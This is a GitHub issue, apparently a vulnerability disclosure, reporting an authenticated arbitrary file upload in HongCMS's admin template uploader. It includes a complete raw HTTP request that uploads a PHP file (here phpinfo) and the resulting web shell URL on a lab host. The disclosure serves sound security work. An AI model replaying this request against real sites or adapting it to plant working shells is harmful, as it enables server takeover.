Arbitrary File Upload Getshell 

Steps To Reproduce:
    1. Login to the backstage as the admin;
    2. POST shell data via  /hongcms/admin/index.php/template
```
POST /hongcms/admin/index.php/template/upload HTTP/1.1
Host: 192.168.0.193
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.193/hongcms/admin/index.php/template
Content-Type: multipart/form-data; boundary=---------------------------132861034225313
Content-Length: 341
Cookie: hibext_instdsigdipv2=1; _ga=GA1.1.265473964.1530252217; _gid=GA1.1.1034335256.1530252217; YmTry9y6Wf3Znews=1; YmTry9y6Wf3Zadmin=1adc8a472890f6070d13d2cc3d19fd8c; YmTry9y6Wf3Zproduct=5
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------132861034225313
Content-Disposition: form-data; name="dir"


-----------------------------132861034225313
Content-Disposition: form-data; name="file"; filename="only.php"
Content-Type: application/octet-stream

<?php 
phpinfo();
?>
-----------------------------132861034225313--
```

![3](https://user-images.githubusercontent.com/6846604/42078383-cf23ac1a-7bae-11e8-99bd-6bf594452ea3.png)



3. shell is http://192.168.0.193/hongcms/public/templates/only.php
![1](https://user-images.githubusercontent.com/6846604/42077098-4ef624e0-7baa-11e8-856f-9a4c9909095a.png)






Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Arbitrary File Upload Getshell #5

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Arbitrary File Upload Getshell #5

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions